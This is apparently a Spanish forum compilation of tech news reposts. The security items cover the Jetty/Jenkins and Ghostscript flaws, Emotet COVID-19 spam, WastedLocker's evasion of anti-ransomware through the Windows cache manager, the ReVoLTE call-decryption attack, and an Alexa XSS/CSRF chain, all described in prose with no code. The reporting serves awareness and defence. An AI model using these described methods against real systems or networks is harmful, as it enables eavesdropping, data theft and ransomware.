David Shayer, quien fue ingeniero de software para Apple, ha contado en TidBits su versión de la historia de cómo se desarrolló en secreto un iPod para el Departamento de Energía de los Estados Unidos. Tony Fadell, considerado como uno de los padres del iPod, también ha querido compartir el caso en redes sociales. Shayer asegura que, si bien nunca se le llegó a decir cuál era el propósito exacto de construir este dispositivo, todo apuntaba a que trataban de construir un contador Geiger, es decir, un dispositivo capaz de medir la radiactividad.

Los acontecimientos cuenta Shayer que se dieron en 2005, dos años antes de que se lanzara el iPhone. El proyecto se realizó en máximo secreto, sin registros del proyecto y con tan solo cuatro personas en Apple teniendo constancia del trabajo que se estaba realizando.

El caso del iPod secreto


"Era un día gris a finales de 2005. Estaba sentado en mi escritorio, escribiendo código para el iPod del año siguiente. Sin llamar, el director de iPod Software, el jefe de mi jefe, entró abruptamente y cerró la puerta detrás de él. Fue al grano. "Tengo una tarea especial para ti". Tu jefe no lo sabe. Ayudarás a dos ingenieros del Departamento de Energía de EE. UU a construir un iPod especial.

David Shayer fue el segundo ingeniero contratado para el proyecto del iPod en 2001. Cuenta que escribió su sistema de archivos y que trabajó en todas las partes de su software, a excepción de los códecs de audio del mismo. Cuatro años después, dos ingenieros de Bechtel hicieron la petición al director de software del iPod de crear este iPod "especial", capaz de recopilar datos no especificados en secreto a través de un hardware personalizado. Bechtel es la mayor compañía a nivel de ingeniería en los Estados Unidos, la cual estaba subcontratada por el Departamento de Energía del país.


Según Shayer tan solo cuatro personas en Apple conocían este proyecto: él, el director de iPod Software, el vicepresidente de la división iPod y el vicepresidente senior de hardware. Básicamente, se les pedía dotar al iPod de hardware personalizado pero que, a nivel de interfaz y de diseño del propio iPod, todo se viese como en un dispositivo normal.

La ayuda a los ingenieros se realizó en absoluto secreto, dotándoles de una oficina privada en la que no se tenía acceso a la propia red de Apple
Para trabajar en este proyecto, el ingeniero cuenta que solicitó una oficina con conexión fuera del firewall de Apple para los dos ingenieros, para que no pudieran acceder a la red de la compañía. Del mismo modo, Shayer afirma que no se les permitió acceder al servidor de código fuente. El proyecto era un favor para el Departamento de Energía, no un proyecto con su correspondiente contrato.

"A medida que aprendieron a manejar el sistema, explicaron lo que querían hacer, al menos a grandes rasgos. Habían agregado hardware especial al iPod, que generaba datos que querían grabar en secreto. Tuvieron cuidado de asegurarse de que nunca vi el hardware, y nunca lo hice".

Asegura Shayer que nunca llegó a saber el hardware que introdujeron los ingenieros en el iPod. Cuenta que él les enseñó cómo configurar las herramientas de desarrollo, modificar algunos aspectos de la interfaz, introducir elementos dentro del código, etc. El proceso fue viable ya que, cuenta Shayer, que se usó el iPod de quinta generación. Este iPod, aparte de tener 60 GB, era relativamente fácil de abrir sin dejar marcas, según el ingeniero. La siguiente generación de iPod, el nano, se firmó para bloquear instalaciones y modificaciones de terceros y, en caso de haberlas, el dispositivo no arrancaba, lo que hubiera complicado el proceso.

"Supongo que Paul y Matthew estaban construyendo algo así como un contador Geiger sigiloso. Podrías caminar por una ciudad, escuchando tranquilamente tus canciones, mientras registras pruebas de radiactividad (por ejemplo, escaneando uranio robado o de contrabando, o pruebas de un programa de desarrollo de bombas sucias) sin posibilidad de que la prensa o el público se enteren"

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Jenkins, un popular software de servidor de automatización de código abierto, publicó un aviso el lunes sobre una vulnerabilidad crítica en el servidor web Jetty que podría dañar la memoria y hacer que se divulgue información confidencial.

Rastreada como CVE-2019-17638 , la falla tiene una calificación CVSS de 9.4 e impacta en las versiones 9.4.27.v20200227 a 9.4.29.v20200521 de Eclipse Jetty, una herramienta con todas las funciones que proporciona un servidor HTTP Java y un contenedor web para su uso en marcos de software.

"Jenkins incluye Winstone-Jetty, un envoltorio de Jetty, para que actúe como servidor HTTP y servlet cuando se comienza a usar java -jar jenkins.war. Así es como se ejecuta Jenkins cuando se usa cualquiera de los instaladores o paquetes, pero no cuando se ejecuta con servlet contenedores como Tomcat ", se lee en el aviso.

"La vulnerabilidad puede permitir que atacantes no autenticados obtengan encabezados de respuesta HTTP que pueden incluir datos confidenciales destinados a otro usuario".

La falla , que afecta a Jetty y Jenkins Core, parece haber sido introducida en la versión 9.4.27 de Jetty, que agregó un mecanismo para manejar grandes encabezados de respuesta HTTP y evitar desbordamientos de búfer.

"El problema fue en el caso de un desbordamiento del búfer, liberamos el búfer del encabezado, pero no anulamos el campo", dijo el jefe del proyecto de Jetty, Greg Wilkins .

Para manejar esto, Jetty lanza una excepción para producir un error HTTP 431, lo que hace que los encabezados de respuesta HTTP se publiquen en el grupo de búfer dos veces, lo que a su vez provoca daños en la memoria y divulgación de información.

Por lo tanto, debido a la versión doble, dos subprocesos pueden adquirir el mismo búfer del grupo al mismo tiempo y permitir potencialmente que una solicitud acceda a una respuesta escrita por el otro subproceso, que puede incluir identificadores de sesión, credenciales de autenticación y otra información confidencial .

Dicho de otra manera, "mientras que thread1 está a punto de usar ByteBuffer para escribir datos de response1, thread2 llena el ByteBuffer con datos de response2. Thread1 luego procede a escribir el búfer que ahora contiene datos de response2. Esto da como resultado client1, que emitió request1 y espera respuestas, para ver la respuesta2 que podría contener datos confidenciales pertenecientes a client2 ".

En un caso, la corrupción de la memoria hizo posible que los clientes se movieran entre sesiones, por lo que tenían acceso entre cuentas, ya que las cookies de autenticación de la respuesta de un usuario se enviaban a otro usuario, lo que permitía al usuario A saltar a la sesión del usuario B.

Después de que se revelaron las implicaciones de seguridad, la vulnerabilidad se abordó en Jetty 9.4.30.v20200611 lanzado el mes pasado. Jenkins,Winstone , ha corregido la falla en su utilidad en Jenkins 2.243 y Jenkins LTS 2.235.5 lanzados ayer.
Se recomienda que los usuarios de Jenkins actualicen su software a la última versión para mitigar la falla de corrupción del búfer.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El malware Emotet ha comenzado a enviar correos electrónicos no deseados relacionados con COVID-19 a empresas estadounidenses después de no estar activo durante la mayor parte de la pandemia estadounidense.

Antes de apagarse el 7 de febrero de 2020, el malware Emotet solía enviar spam con el tema COVID-19 para distribuir malware en otros países ya afectados por la pandemia.

Como el inicio de la pandemia de EE. UU. Fue alrededor de marzo, Emotet nunca tuvo la oportunidad de apuntar a las empresas de EE. UU. Con spam relacionado con COVID-19.

Con la espalda de Emotet en pleno apogeo nuevamente después de despertar el 17 de julio de 2020, Emotet comenzó a arrojar spam COVID-19, y esta vez ahora se dirige a usuarios en los EE.

COVID-19 Emotet spam ahora apunta a organizaciones de EE. UU.
En un nuevo correo electrónico no deseado descubierto por el investigador de seguridad  Fate112 , Emotet ha estado enviando un correo electrónico robado que pretende ser de 'California Fire Mechanics' enviando una 'actualización de mayo COVID-19'.


Este correo electrónico no es una plantilla creada por los actores de Emotet, sino más bien un correo electrónico robado a una víctima existente y adoptado en las campañas de spam del malware.

Se adjunta al correo electrónico un archivo adjunto malicioso titulado 'EG-8777 Informe médico COVID-19.doc', que utiliza una plantilla de documento genérica utilizada en campañas anteriores.

Esta plantilla pretende ser creada desde un dispositivo iOS y requiere que los usuarios hagan clic en 'Habilitar contenido' para verlo correctamente.


Una vez que un usuario hace clic en el botón 'Habilitar contenido', se ejecutará un comando de PowerShell que descarga el ejecutable del malware Emotet de uno de tres a cuatro sitios.

En esta campaña en particular, cuando se descargue, Emotet se guardará en la carpeta% UserProfile% y se nombrará como un número de tres dígitos, como 498.exe.


Una vez ejecutada, la computadora de la víctima se convertirá en parte de la operación del bot de malware y enviará más correos electrónicos maliciosos.

En última instancia, Emotet descargará e instalará otro malware como Qbot o TrickBot, que se utilizará para robar sus datos, contraseñas y potencialmente conducir a la implementación de ransomware.

En una conversación con el experto en Emotet Joseph Roosen , se le dijo a BleepingComputer que recientemente se han visto otras campañas de COVID-19 usando correos electrónicos en cadena de respuesta.

"Hasta ahora solo lo hemos visto como parte de correos electrónicos de cadena de respuesta robados. Aún no lo hemos visto como una plantilla genérica, pero estoy seguro de que está a la vuelta de la esquina, jeje. Hubo una cadena de respuesta que vi ayer que fue enviada a Cientos de direcciones que se referían al cierre de una organización debido al covid-19. No me sorprendería si Ivan estuviera filtrando algunas de esas cadenas de respuesta para enfocarse en las que involucran al covid-19 ", dijo Roosen a BleepingComputer.

Ivan es el apodo de Roosen para los operadores rusos de malware Emotet.

La firma de seguridad de correo electrónico Cofense también le dijo a BleepingComputer que recientemente han estado viendo spam relacionado con COVID-19 que usa archivos adjuntos llamados "Informe COVID-19 08 12.doc" y similares.

Cofense afirma que la fecha del documento cambiará al día de la campaña.

Como Emotet es un malware tan peligroso que puede conllevar una variedad de riesgos, todos los usuarios domésticos y corporativos deben tener cuidado al abrir documentos que requieren que "Habilite el contenido".

Si recibe este tipo de correos electrónicos, primero escanee el archivo adjunto con un escáner antivirus para asegurarse de que sea seguro abrirlo. Incluso entonces, debes proceder con precaución.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Después de cuatro meses de espera, por fin tenemos a KDE neon oficialmente migrado a la base tecnológica de Ubuntu 20.04 LTS, la última versión de sistema de Canonical con 5 años de soporte (al menos en un principio) y orientada a entornos de producción (aunque esto no quiere decir que no sea un excelente sistema para entornos domésticos, sino todo lo contrario).

Poca presentación necesita ya KDE neon, una distribución del proyecto KDE iniciada por Jonathan Riddell que toma la base de Ubuntu LTS y la combina con las últimas versiones del entorno de escritorio Plasma y las aplicaciones de KDE mediante la adición de un repositorio propio. Esta peculiar combinación ha ido mejorando con el paso del tiempo hasta consolidarse como uno de los mejores sistemas GNU/Linux que existen, además de ser para muchos la mejor forma de disfrutar del entorno de escritorio Plasma.

El anuncio oficial explica que los usuarios tendrían que "ver una ventana emergente en su instalación al día siguiente (a partir de hoy). Pedirá asegurarse de que el sistema esté actualizado y luego actualizará la base a 20.04, que demora un tiempo en descargarse y en instalarse". Aparte de migrar a la última LTS de Ubuntu, como principal novedad están las nuevas imágenes ISO con el instalador Calamares en todas ellas. Los responsables de KDE neon han añadido al instalador Calamares un modo de instalación OEM y una casilla para marcar el cifrado completo de disco.

Cambiando de tema y siguiendo con las novedades de KDE neon, "las imágenes de Docker aún deben actualizarse y los paquetes Snap también deben moverse". Por otro lado, "las ediciones Testing y Unstable se crean a partir de las ramas de Git que se lanzarán próximamente y las ramas de Git no probadas. Lamentablemente, al probar las ISO instalables, encontramos algunos errores en el instalador de Git de Calamares, por lo que aún no se han publicado, pero la actualización seguirá apareciendo en las instalaciones existentes."

Pues ya tenemos entre nosotros a KDE neon actualizada a la base de Ubuntu 20.04. Viendo que la última LTS del sistema de Canonical ha arrancado con muy buen pie, esperemos que eso repercuta en un excelente comienzo para la renovación de una de las derivadas más interesantes.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Se acaba de presentar el lanzamiento de la actualización acumulativa KDE Applications de agosto (20.08) desarrollada por el proyecto KDE. En total, como parte de la actualización se publicaron las nuevas versiones de 216 programas, bibliotecas y complementos del proyecto.

Para quienes aún desconocen de KDE Applications, les podemos comentar que estas son un conjunto de aplicaciones y bibliotecas compatibles diseñadas por la comunidad de KDE, que se utilizan principalmente en sistemas operativos basados en Linux, pero en su mayoría de estas aplicaciones son multiplataforma y se lanzan en un programa de lanzamiento común.

Novedades de KDE Applications 20.08

En esta nueva version de KDE Applications 20.08 se introdujeron algunos cambios importantes al administrador de archivos «Dolphin», ya que ahora muestra miniaturas de archivos en formato 3MF con modelos para impresión 3D, también cuenta con la capacidad de obtener una vista previa de miniaturas de archivos y directorios ubicados en sistemas de archivos cifrados, como Plasma Vault, al guardar la caché de miniaturas directamente dentro del sistema de archivos cifrados, y si este sistema de archivos no se puede escribir, entonces sin guardar versiones en caché.


Además, Dolphin ahora trunca el final del nombre largo, pero conserva la extensión para facilitar la identificación del tipo de archivo. La ubicación se guarda en el sistema de archivos cuando se cierra el administrador de archivos y se restaura cuando se abre (este comportamiento se puede cambiar en la configuración en la sección Inicio).

También se destaca la «instalación simplificada de complementos», que ahora se pueden instalar en la ventana «Obtener novedades» sin manipulaciones manuales y sin agregar a la lista de servicios.

Por otra parte, para el emulador de terminal de Konsole, en el menú contextual, se ha agregado al portapapeles la función de copiar la ruta completa al archivo o directorio al que apunta el cursor, tambien se agregó resaltado de nuevas líneas que aparecen cuando el contenido se desplaza rápidamente.

En el menú contextual que se muestra cuando el cursor del mouse está sobre el nombre del archivo, ahora es posible abrir este archivo en la aplicación seleccionada. Cuando se visualiza en modo de pantalla dividida, se proporciona la separación de títulos de las ventanas mostradas y se ofrece la posibilidad de vincular etiquetas de color a pestañas y realizar un seguimiento de la actividad de los procesos en las pestañas.


En el terminal Yakuake que aparece en la tecla F12, se ha mejorado el trabajo en configuraciones controladas por Wayland, se ha agregado la capacidad de configurar todas las teclas de acceso rápido y se muestra el indicador de inicio del terminal en la bandeja del sistema.

DigiKam 7.0 tiene un sistema completamente rediseñado para clasificar caras en fotografías, que permite identificar y reconocer caras en fotografías y etiquetarlas automáticamente. Puede encontrar una descripción general de los cambios en un anuncio separado.

En el editor de texto de Kate, a través del menú «Abrir reciente», es posible mostrar no solo los archivos abiertos recientemente a través del cuadro de diálogo de apertura de archivos, sino también los transferidos a Kate desde la línea de comandos y otras fuentes. El estilo de la barra de pestañas se ha alineado con otras aplicaciones de KDE.

Elisa ahora tiene la capacidad de mostrar todos los géneros, músicos o álbumes en la barra lateral. La lista de reproducción ahora muestra el progreso de la canción actual en su lugar. El panel superior se adapta al tamaño de la ventana y a la elección de los modos vertical u horizontal.

Okular Document Viewer resuelve problemas con la ubicación de los elementos de Impresión y Vista previa de impresión en los menús.

El visor de imágenes de Gwenview mantiene el tamaño de la última área de recorte para acelerar el recorte de varias imágenes típicas del mismo tamaño.

Vía:  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El proyecto GNOME lanza una nueva versión de su entorno gráfico una vez al mes aproximadamente. El pasado julio lanzó la cuarta versión de punto de la serie 3.36, y este miércoles ha lanzado GNOME 3.36.5, lo que es la penúltima actualización de mantenimiento de un escritorio que se lanzó por primera vez en marzo de 2020. Como versión de punto, llega sin nuevas funciones realmente destacadas, pero sigue mejorando el rendimiento y la fiabilidad de uno de los entornos gráficos más populares de los existentes en Linux.

Pero, como en la mayoría de opciones, GNOME no es sólo la imagen del sistema operativo; también incluye sus propias aplicaciones y todo este software, cuando ha sido necesario, ha recibido corrección de errores y mejoras de rendimiento. A continuación tenéis una lista con las novedades más destacadas que han llegado junto a GNOME 3.36.5.

Novedades más destacadas de GNOME 3.36.5

- Mejoras en Firefox Sync para Epiphany, anteriormente conocido como GNOME Web. El navegador también ha recibido una corrección para la nueva manera de crear pestañas que se ordenan al cerrar nuevas pestañas y otra corrección para un cierre que se producía al arrastrar y soltar en File Roller, algo que ocurría al cancelar el proceso de sobrescrita.
- La pantalla de inicio de sesión GNOME Display Manager (GDM) ha recibido mejoras para el cambio de usuarios.
- La utilidad de discos de GNOME ahora nos permite crear particiones usando parámetros especiales al pedir el máximo del tamaño de la partición.
- GUPnP ahora incluye una mejor comprobación de suscripciones en las direcciones V6 link-local.
- GNOME Boxes ahora puede bajar contenido de URI en el asistente de creación de máquinas virtuales, ha mejorado las descargas recomendadas para nuevos lanzamientos de sistemas operativos, varias mejoras en la gestión de pantallas, soporte para la reducción de escala sólo en pantallas SPICE y correcciones recientes de autenticación RDP.
- Simple Scan ha mejorado el escaneado de colores para el backend Brother ADS 2200 y 2700.
- Orca ha corregido varios fallos en cómo gestionaba los eventos de Google Docs.
- Se ha incluido GK 3.99.0.

La próxima versión ya será un GNOME 3.36.6 que llegará el 5 de septiembre. Después de eso, el proyecto ya lanzará GNOME 3.38, que será la versión que incluirán sistemas operativos como Ubuntu 20.10 Groovy Gorilla.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cada día los ataques de malware y ransomware son más sofisticados. En este caso hablamos del ransomware WastedLocker que está abusando de una función de administración de memoria de Windows para eludir la detección por parte del software de seguridad. Vamos a empezar explicando como las soluciones anti-ransomware detectan este software malicioso, y luego, cómo WastedLocker trabaja para evitarlo.

Cómo funcionan los softwares anti-ransomware

Actualmente las soluciones anti-ransomware trabajan supervisando el sistema operativo en busca de llamadas al sistema de archivos que utiliza el ransomware tradicionalmente para cifrar un archivo. La forma de operar las soluciones anti-ransomware es la siguiente: el software de seguridad va a registrar un controlador minifiltro que le permite monitorizar en tiempo real las llamadas del sistema que interactúan con el sistema de archivos.

En el caso de que este controlador detectara un proceso desconocido, que realiza muchas operaciones secuenciales al abrir un archivo, saltarían las alarmas, como, por ejemplo, escribir en él y luego cerrar el archivo. Entonces se activará una detección de comportamiento y el proceso ofensivo finalizará en ese momento.

En resumen, este método de detección de comportamiento esencialmente sacrifica algunos archivos para detectar comportamientos maliciosos y evitar que el resto de la unidad se cifre por completo por el ransomware.

WastedLocker usa el administrador de caché de Windows

El ransomware WastedLocker ha adquirido gran popularidad las últimas semanas y se ha atribuido al grupo de piratería Evil Corp. En un informe realizado por los investigadores de seguridad de Sophos, explican cómo WastedLocker usa el Administrador de caché de Windows para eludir la detección.

Windows, para aumentar su rendimiento, tiene una forma de trabajar de la que se ha aprovechado este ransomware. En ella, los archivos de uso común o los archivos específicos de una aplicación se leen y almacenan en la memoria caché de Windows, que utiliza la memoria del sistema.

El funcionamiento es el siguiente, si un programa necesita acceder a un archivo, el sistema operativo verificará si está en la caché y, de ser así, lo cargará desde allí. La ventaja que tiene es que esos datos almacenados en la memoria caché se pueden acceder más rápido a ellos que si tuviéramos que leerlos desde una unidad de disco.

WastedLocker para evitar la detección mediante software anti-ransomware, incluye una rutina que abre ese archivo, lo lee en el administrador de caché de Windows, y luego cierra el archivo original.


Como los datos ahora se están guardados en el administrador de caché de Windows, WastedLocker lo que hará es cifrar el contenido del archivo almacenado en la memoria caché, en lugar del archivo almacenado en el sistema de archivos.

Ejemplo de actuación WastedLocker

En el momento que modificamos los contenidos de un archivo almacenado en la memoria caché de Windows, se vuelven «sucios». Cuando se «ensucian» suficientes datos, el administrador de caché de Windows volverá a escribir los datos en caché cifrados en sus archivos originales. Debido a que el administrador de caché de Windows se ejecuta como un proceso del sistema, nuestro software anti-ransomware verá esa escritura de los datos cifrados como un proceso de Windows permitido.

Aquí podéis ver en esta captura de pantalla ofrecida por Sophos en que se aprecia como los archivos están siendo encriptados.


Gracias a esta forma de actuar, las detecciones de comportamiento en el software anti-ransomware verán esto como un proceso legítimo escribiendo datos cifrados, y no detectarán que algo está mal. Este nuevo método va a evitar de manera efectiva los módulos de protección contra el ransomware que tenemos instalados en nuestros equipos Windows, por tanto, permitirá que WastedLocker cifre todos nuestros archivos.

El director de ingeniería de Sophos, Mark Loman, manifestó que su motor de protección CryptoGuard ya se ha actualizado para detectarlo. De este modo, se han implementado las actualizaciones de código para los usuarios de HitmanPro.Alert. También los clientes que estén utilizando Intercept X, recibirán esta actualización en un momento posterior y estarán inmediatamente protegidos.

Por último, debemos considerar a WastedLocker como una amenaza de ransomware de la que todas las empresas deben tener en cuenta y preocuparse. Las organizaciones deben estar preparadas para enfrentarse al uso de técnicas avanzadas como el administrador de caché de Windows, flujos de datos alternativo, omisiones de UAC y más.

Vía:  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un equipo de investigadores académicos, que anteriormente aparecieron en los titulares a principios de este año por descubrir graves problemas de seguridad en las redes 4G LTE y 5G, presentó hoy un nuevo ataque llamado ' ReVoLTE ', que podría permitir a los atacantes remotos romper el cifrado utilizado por las llamadas de voz VoLTE. y espiar llamadas telefónicas específicas.

El ataque no explota ninguna falla en el protocolo Voice over LTE (VoLTE); en su lugar, aprovecha la implementación débil de la red móvil LTE por parte de la mayoría de los proveedores de telecomunicaciones en la práctica, lo que permite que un atacante espíe las llamadas telefónicas cifradas realizadas por las víctimas objetivo.

El protocolo VoLTE o Voice over Long Term Evolution es una comunicación inalámbrica de alta velocidad estándar para teléfonos móviles y terminales de datos, incluidos los dispositivos y wearables de Internet de las cosas (IoT), que implementan tecnología de acceso por radio 4G LTE.

El quid del problema es que la mayoría de los operadores móviles utilizan a menudo el mismo flujo de claves para dos llamadas posteriores dentro de una conexión de radio para cifrar los datos de voz entre el teléfono y la misma estación base, es decir, la torre de telefonía móvil.

Por lo tanto, el nuevo ataque ReVoLTE aprovecha la reutilización del mismo flujo de claves por estaciones base vulnerables, lo que permite a los atacantes descifrar el contenido de las llamadas de voz impulsadas por VoLTE en el siguiente escenario.


Sin embargo, la reutilización de una secuencia de claves predecible no es nueva y fue señalada por primera vez por Raza & Lu , pero el ataque ReVoLTE lo convierte en un ataque práctico.

¿Cómo funciona el ataque ReVoLTE?

Para iniciar este ataque, el atacante debe estar conectado a la misma estación base que la víctima y colocar un rastreador de enlace descendente para monitorear y grabar una 'llamada dirigida' hecha por la víctima a otra persona que necesita ser descifrada más tarde, como parte del primera fase del ataque ReVoLTE.

Una vez que la víctima cuelga la 'llamada dirigida', se requiere que el atacante llame a la víctima, generalmente dentro de los 10 segundos inmediatamente, lo que obligaría a la red vulnerable a iniciar una nueva llamada entre la víctima y el atacante en la misma conexión de radio utilizada por el anterior. llamada dirigida.

"La reutilización de la secuencia de claves se produce cuando el destino y la llamada de secuencia de claves utilizan la misma clave de cifrado del plano de usuario. Como esta clave se actualiza para cada nueva conexión de radio, el atacante debe asegurarse de que el primer paquete de la llamada de secuencia de claves llegue dentro de la fase activa después de la llamada de destino ", dijeron los investigadores.

Una vez conectado, como parte de la segunda fase, el atacante necesita involucrar a la víctima en una conversación y grabarla en texto plano, lo que ayudaría al atacante a calcular posteriormente el flujo de claves utilizado por la llamada posterior.

Según los investigadores, XOR-ing los flujos de claves con el marco cifrado correspondiente de la llamada dirigida capturada en la primera fase descifra su contenido, lo que permite a los atacantes escuchar la conversación que tuvo su víctima en la llamada telefónica anterior.

"Como esto da como resultado el mismo flujo de claves, todos los datos RTP se cifran de la misma manera que los datos de voz de la llamada objetivo. Tan pronto como se generó una cantidad suficiente de datos del flujo de claves, el adversario cancela la llamada", se lee en el documento.

Sin embargo, la duración de la segunda llamada debe ser mayor o igual que la primera para poder descifrar cada trama; de lo contrario, solo puede descifrar una parte de la conversación.

"Es importante tener en cuenta que el atacante tiene que involucrar a la víctima en una conversación más larga. Cuanto más tiempo ha hablado con la víctima, más contenido de la comunicación anterior puede descifrar", se lee en el documento.

"Cada trama se asocia con un recuento y se cifra con un flujo de claves individual que extraemos durante el cálculo del flujo de claves. Como el mismo recuento genera el mismo flujo de claves, el recuento sincroniza los flujos de claves con los marcos cifrados de la llamada de destino. XOR-ing los flujos de claves con la trama cifrada correspondiente descifra la llamada de destino ".

"Como nuestro objetivo es descifrar la llamada completa, la llamada de flujo de claves debe ser tan larga como la llamada de destino para proporcionar una cantidad suficiente de paquetes, ya que de lo contrario solo podemos descifrar una parte de la conversación".

Detectar el ataque y la demostración de ReVoLTE

Para demostrar la viabilidad práctica del ataque ReVoLTE, el equipo de académicos de la Universidad Ruhr de Bochum implementó una versión de extremo a extremo del ataque dentro de una red comercial vulnerable y teléfonos comerciales.

El equipo utilizó el analizador de enlace descendente Airscope de Software Radio System para rastrear el tráfico cifrado y tres teléfonos basados ​​en Android para obtener el texto sin formato conocido en el teléfono del atacante. Luego comparó las dos conversaciones grabadas, determinó la clave de cifrado y finalmente descifró una parte de la llamada anterior.


Puede ver el video de demostración del ataque ReVoLTE, que, según los investigadores, podría costar menos de $ 7000 a los atacantes para configurar el ataque y, eventualmente, descifrar el tráfico de enlace descendente.

El equipo probó una serie de células de radio seleccionadas al azar en toda Alemania para determinar el alcance del problema y descubrió que afecta a 12 de las 15 estaciones base en Alemania, pero los investigadores dijeron que la brecha de seguridad también afecta a otros países.

Los investigadores notificaron a los operadores de estaciones base alemanes afectados sobre el ataque ReVoLTE a través del proceso del Programa de divulgación coordinada de vulnerabilidades de GSMA a principios de diciembre de 2019, y los operadores lograron implementar los parches en el momento de la publicación.

Dado que el problema también afecta a una gran cantidad de proveedores en todo el mundo, los investigadores lanzaron una aplicación de Android de código abierto, llamada ' Mobile Sentinel ', que puede usar para detectar si su red 4G y estaciones base son vulnerables al ataque ReVoLTE o no.

Los investigadores, David Rupprecht, Katharina Kohls y Thorsten Holz de RUB University Bochum y Christina Pöpper de NYU Abu Dhabi, también publicaron un sitio web dedicado y un documento de investigación en PDF , titulado "Call Me Maybe:
Eavesdropping Encrypted LTE Calls With REVOLTE", que detalla el ReVoLTE ataque, donde puede encontrar más detalles.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Atención! Si usa el asistente de voz de Amazon, Alexa, en sus parlantes inteligentes, solo abrir un enlace web de apariencia inocente podría permitir que los atacantes instalen habilidades de piratería en él y espíen sus actividades de forma remota.

Los investigadores de ciberseguridad de Check Point, Dikla Barda, Roman Zaikin y Yaara Shriki, revelaron hoy graves vulnerabilidades de seguridad en el asistente virtual Alexa de Amazon que podrían hacerlo vulnerable a una serie de ataques maliciosos.

Según un nuevo informe publicado por Check Point Research y compartido con The Hacker News, los "exploits podrían haber permitido a un atacante eliminar / instalar habilidades en la cuenta de Alexa de la víctima objetivo, acceder a su historial de voz y adquirir información personal a través de la interacción de habilidades cuando el el usuario invoca la habilidad instalada ".

"Los altavoces inteligentes y los asistentes virtuales son tan comunes que es fácil pasar por alto cuántos datos personales tienen y su función en el control de otros dispositivos inteligentes en nuestros hogares", dijo Oded Vanunu, jefe de investigación de vulnerabilidades de productos.

"Pero los piratas informáticos los ven como puntos de entrada a la vida de las personas, que les brindan la oportunidad de acceder a los datos,


Amazon corrigió las vulnerabilidades después de que los investigadores revelaran sus hallazgos a la compañía en junio de 2020.

Un defecto XSS en uno de los subdominios de Amazon

Check Point dijo que las fallas se debieron a una política CORS mal configurada en la aplicación móvil Alexa de Amazon, lo que podría permitir a los adversarios con capacidades de inyección de código en un subdominio de Amazon realizar un ataque entre dominios en otro subdominio de Amazon.

Dicho de otra manera, la explotación exitosa habría requerido solo un clic en un enlace de Amazon que ha sido especialmente diseñado por el atacante para dirigir a los usuarios a un subdominio de Amazon que es vulnerable a los ataques XSS.
Además, los investigadores encontraron que una solicitud para recuperar una lista de todas las habilidades instaladas en el dispositivo Alexa también devuelve un token CSRF en la respuesta.

El propósito principal de un toke n CSRF es prevenir ataques de falsificación de solicitudes entre sitios en los que un enlace o programa malicioso hace que el navegador web de un usuario autenticado realice una acción no deseada en un sitio web legítimo.

Esto sucede porque el sitio no puede diferenciar entre solicitudes legítimas y solicitudes falsificadas.

Pero con el token en posesión, un mal actor puede crear solicitudes válidas al servidor backend y realizar acciones en nombre de la víctima, como instalar y habilitar una nueva habilidad para la víctima de forma remota.

En resumen, el ataque funciona al pedirle al usuario que haga clic en un enlace malicioso que navega a un subdominio de Amazon ("track.amazon.com") con una falla XSS que se puede explotar para lograr la inyección de código.


Luego, el atacante lo usa para activar una solicitud al subdominio "skillsstore.amazon.com" con las credenciales de la víctima para obtener una lista de todas las habilidades instaladas en la cuenta de Alexa y el token CSRF.
En la etapa final, el exploit captura el token CSRF de la respuesta y lo usa para instalar una habilidad con una ID de habilidad específica en la cuenta de Alexa del objetivo, eliminar sigilosamente una habilidad instalada, obtener el historial de comandos de voz de la víctima e incluso acceder al personal. información almacenada en el perfil del usuario.

La necesidad de seguridad de IoT

Con el tamaño del mercado global de altavoces inteligentes proyectado para alcanzar los $ 15.6 mil millones para 2025, la investigación es otra razón por la cual la seguridad es crucial en el espacio de IoT.

A medida que los asistentes virtuales se vuelven más omnipresentes, se convierten cada vez más en objetivos lucrativos para los atacantes que buscan robar información confidencial e interrumpir los sistemas domésticos inteligentes.

"Los dispositivos de IoT son inherentemente vulnerables y aún carecen de la seguridad adecuada, lo que los convierte en objetivos atractivos para los actores de amenazas", concluyeron los investigadores.

"Los ciberdelincuentes buscan continuamente nuevas formas de violar los dispositivos o utilizarlos para infectar otros sistemas críticos. Tanto el puente como los dispositivos sirven como puntos de entrada. Deben mantenerse seguros en todo momento para evitar que los piratas informáticos se infiltran en nuestros hogares inteligentes".

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hace pocos días dieron a conocer la noticia de que fue identificada una vulnerabilidad en Ghostscript (CVE-2020-15900) que podría provocar la modificación de archivos y la ejecución de comandos arbitrarios al abrir documentos PostScript con formato especial.

Para quienes desconozcan de Ghostscript deben saber que este es un motor de renderizado para contenido Postscript y PDF y es comúnmente utilizado para convertir documentos PDF y Postscript en imágenes con fines de vista previa, miniaturas e impresión.

También se utiliza para la reproducción de documentos de calidad completa para muchos visores de PDF, incluidos los visores populares en Android, y tiene licencia de varias grandes empresas como Google para renderizar en la nube.

Sobre la vulnerabilidad en Ghostscript
El fallo fue identificado en el uso del operador rsearch PostScript no estándar en un documento que permite provocar un desbordamiento del tipo uint32_t al calcular el tamaño, sobrescribir áreas de memoria fuera del búfer asignado y obtener acceso a archivos en el sistema de archivos, que se pueden usar para organizar un ataque para ejecutar código arbitrario en el sistema (por ejemplo, agregando comandos a ~/.bashrc o ~/.profile).

El fragmento encontrado por AFL empujaba una cadena vacía a la pila: los corchetes vacíos (), copiaban la referencia a esto, lo que resultaba en una pila con dos cadenas vacías () ()y luego ejecutaba la búsqueda inversa. En otras palabras, buscaba una cadena vacía en una cadena vacía, comenzando desde el final.

